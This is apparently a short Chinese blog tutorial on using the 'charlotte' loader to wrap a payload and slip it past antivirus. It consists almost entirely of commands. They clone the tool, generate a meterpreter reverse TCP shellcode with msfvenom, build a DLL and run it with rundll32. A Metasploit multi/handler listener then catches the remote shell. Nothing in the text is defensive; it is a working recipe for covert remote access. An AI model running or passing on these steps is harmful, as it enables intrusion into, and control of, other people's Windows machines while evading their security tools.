charlotte 低调入过
预览 / Preview
生成payload
代码语言:javascript复制git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
cd charlotte
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
python charlotte.py # 最后一行有个命令 rundll32 xxxxxxxx
rundll32 charlotte.dll, UehQD3rwWxT
运行payload
代码语言:javascript复制C:WindowsSystem32rundll32.exe C:UsersxrDesktopcharlotte.dll UehQD3rwWxT
监听payload
代码语言:javascript复制use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.21.129
set lport 53237
run